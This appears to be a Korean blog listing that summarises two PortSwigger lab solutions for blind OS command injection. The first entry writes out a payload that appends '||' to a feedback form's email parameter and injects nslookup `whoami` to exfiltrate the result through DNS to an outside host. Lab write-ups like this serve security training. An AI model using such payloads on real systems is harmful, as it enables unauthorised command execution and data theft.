Lab: Blind OS command injection with out-of-band data exfiltration 문제 풀이(WriteUp) 문제 설명DNS 쿼리를 통해 whoami 결과 확인문제 풀이문제 접속 후 Submit feedback 접근 피드백 양식에 맞게 작성 후 요청 피드백 요청 시 email 파라미터에 || 추가 후 Command 삽입nslookup `whoami`.주소 를 통해 whoami의 결과 값을 포함하여 DNS 질의 도메인 이름 앞부분에 whoami 결과가 담겨져서 요청이 오게 됨 WEB hacking/PortSwigger 2025.02.17
Lab: Blind OS command injection with out-of-band interaction 문제 풀이(WriteUp) 문제 설명Command Injeciton을 통해 Burp Collaborator에 DNS 조회문제 풀이문제 접속 후 Submit feedback 접근 피드백 양식에 맞춰 작성 후 요청 피드백 요청 시 email 파라미터에 || 후 Command 명령어를 삽입하여 DNS 질의DNS 질의시 test. 추가하여 앞에 데이터를 전송할 수 있음 burp Collaborator 확인 시 요청 응답 성공 확인 WEB hacking/PortSwigger 2025.02.16
